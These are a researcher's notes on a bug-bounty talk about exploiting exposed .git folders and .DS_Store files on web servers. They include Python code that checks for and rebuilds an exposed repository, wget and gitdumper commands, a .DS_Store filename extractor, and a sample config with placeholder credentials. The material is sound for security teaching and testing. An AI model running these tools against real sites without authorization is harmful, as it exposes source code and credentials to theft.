Hi, these are the notes I took while watching the “Small Files And Big Bounties, Exploiting Sensitive Files” talk given by Sebastian Neef and Tim Philipp Schäfers at LevelUp 0x02 (2018).
.git folder disclosure
This happens when the deployment process is simply cd /var/www/html && git pull
Then the /.git/ folder might be accessible!
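A quick way to check whether a target exposes its .git folder is to request .git/HEAD and see if the response looks like a real HEAD file. This is a minimal sketch; the function names (looks_like_git_head, git_exposed) are mine, not from the talk.

```python
import re
import urllib.request

def looks_like_git_head(data: bytes) -> bool:
    """Heuristic: a real .git/HEAD is either a symbolic ref or a bare commit hash."""
    text = data.strip()
    return text.startswith(b"ref: refs/") or re.fullmatch(rb"[0-9a-f]{40}", text) is not None

def git_exposed(base_url: str) -> bool:
    """Fetch <base_url>/.git/HEAD and check whether it looks like a git HEAD file."""
    try:
        with urllib.request.urlopen(base_url.rstrip("/") + "/.git/HEAD", timeout=5) as resp:
            return looks_like_git_head(resp.read())
    except OSError:  # covers URLError/HTTPError (both subclass OSError)
        return False
```

This beats just checking for a 200 status, since many servers answer custom error pages with 200.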
Why is it bad?
If directory listing is enabled
An attacker can download the whole repository with wget
Demo
wget --mirror --include-directories=/.git http://domain.tld/.git/
git status # Shows all files as deleted, because only the .git folder was mirrored (the working tree is empty)
git checkout -- . # Restores the working tree from the downloaded .git data
git log # See what other commits are there
If directory listing is disabled
Getting the whole directory is hard
But two files are always accessible (if there’s a master branch):
.git/HEAD
.git/refs/heads/master
They can be used to obtain one object hash
With it you can download the object file & get new object hashes
Repeat until nothing new is found!
You end up with part or all of the repository on your hard disk
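The fetch-and-repeat loop described above can be sketched in Python. This is a deliberately crude version of what gitdumper.sh automates: it only follows hex hashes found in decompressed objects (commits and tags store them as hex; tree entries store raw binary hashes, which a real dumper parses properly). All function names here are mine.

```python
import re
import zlib
import urllib.request

SHA1 = re.compile(rb"[0-9a-f]{40}")

def object_path(h: str) -> str:
    # Loose objects live under .git/objects/<first 2 hex chars>/<remaining 38>
    return f"objects/{h[:2]}/{h[2:]}"

def fetch(base: str, rel: str) -> bytes:
    with urllib.request.urlopen(base.rstrip("/") + "/" + rel, timeout=5) as r:
        return r.read()

def crawl(base: str) -> dict:
    """Start from HEAD, follow the ref to the first commit hash, then keep
    downloading every object whose hash appears in an already-fetched object."""
    objects = {}
    head = fetch(base, "HEAD").strip()
    if head.startswith(b"ref:"):
        ref = head.split(b" ", 1)[1].decode()       # e.g. refs/heads/master
        start = fetch(base, ref).strip().decode()
    else:
        start = head.decode()                        # detached HEAD: hash directly
    todo = {start}
    while todo:
        h = todo.pop()
        if h in objects:
            continue
        try:
            raw = zlib.decompress(fetch(base, object_path(h)))
        except OSError:
            continue  # object may be packed, missing, or blocked
        objects[h] = raw
        # Crude: scan the decompressed object for further 40-char hex hashes.
        # This misses blobs referenced by trees (binary hashes) on purpose.
        todo.update(m.decode() for m in SHA1.findall(raw))
    return objects
```

Real tools additionally grab packfiles, logs/HEAD, FETCH_HEAD, etc., which is why they recover far more of the repository.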
./gitdumper.sh http://demo.local/.git/ /output-directory/ # gitdumper.sh is part of the GitTools project
git status # Shows all files as deleted, because only the .git folder was downloaded (the working tree is empty)
git checkout -- . # Restores the working tree from the downloaded .git data
git log # See what other commits are there
Consequences
Source code disclosure
Get the source & find other vulns
Find committed credentials & escalate privileges
! Only look further if the bug bounty program’s (BBP) rules allow it !
In some cases .git/config contains HTTP-BasicAuth credentials
Instant access to company’s repositories (GitLab / GitHub …)
Access to the CI (e.g. GitLabCI): Build scripts & auto-deployment may lead to server pwnage
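What such a leaked .git/config can look like, with HTTP Basic-Auth credentials embedded in the remote URL (every name, host, and credential below is made up for illustration):

```ini
[core]
	repositoryformatversion = 0
	filemode = true
[remote "origin"]
	; hypothetical example: credentials stored inline in the clone URL
	url = https://deploy-user:S3cretPass@gitlab.example.com/acme/webapp.git
	fetch = +refs/heads/*:refs/remotes/origin/*
```

Anyone who downloads the exposed .git folder can read this file directly; no object reconstruction is needed.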
.DS_Store files
Problem 1
The .DS_Store filename starts with a dot, so the Finder won’t show it by default
This is bad for you if you share a ZIP archive or copy files onto a USB stick: the bundled .DS_Store reveals the names of other files stored in the directory, even ones you didn’t copy.
Problem 2
If you use a Mac for development & you use a tool like scp/rsync/ftp to transfer files from your local development environment to a server
For example, if the deployment process is something like scp -r ./code/ server:/var/www/html/ (or the rsync/FTP equivalent)
And if you don’t exclude .DS_Store files from the file transfer
Then …
All files, including .DS_Store, are transferred & exposed
The .DS_Store in each directory contains the list of files present in the remote directory. This is why you get a conflict notification if you try transferring a file that already exists on the server
=> You can know if a directory exists on the server without bruteforcing & even if directory listing is disabled
You can also iterate the process (recursively fetch the .DS_Store file of each listed subdirectory) to obtain the whole remote file structure
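A crude way to pull filenames out of a downloaded .DS_Store without a full parser: record entries store each filename as a 4-byte big-endian character count followed by that many UTF-16BE characters, so scanning the raw bytes for that pattern recovers most names. This is a heuristic sketch of my own, not a faithful implementation of the real buddy-allocator/B-tree format (which dedicated parsers handle properly).

```python
import struct

def ds_store_names(data: bytes) -> set:
    """Heuristically extract filenames from raw .DS_Store bytes.

    We look for a plausible length prefix (3..255 characters, to cut
    noise from short false positives) followed by cleanly decodable
    UTF-16BE text, instead of walking the actual B-tree structure.
    """
    names = set()
    for i in range(len(data) - 4):
        (n,) = struct.unpack_from(">I", data, i)
        if not 3 <= n <= 255 or i + 4 + 2 * n > len(data):
            continue
        try:
            s = data[i + 4 : i + 4 + 2 * n].decode("utf-16-be")
        except UnicodeDecodeError:
            continue
        # Keep only printable strings that look like filenames
        if s.isprintable() and all(c not in '/\\:' for c in s):
            names.add(s)
    return names
```

Expect some false positives; a heuristic scan trades accuracy for simplicity compared to a real format parser like the one demoed below.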
$ file samples/.DS_Store.ctf
samples/.DS_Store.ctf: Apple Desktop Services Store
$ hexdump -C samples/.DS_Store.ctf
# Output: A lot of binary data, you can't read much
$ python main.py samples/.DS_Store.ctf
# Output: File names recovered
Consequences
Directory listing ‘bypass’
Disclosure of (probably) accessible files on the server (without using bruteforce or having directory listing enabled)
Backup files
Database files
Temporary files
Key files (e.g. private keys from SSL-enabled web servers)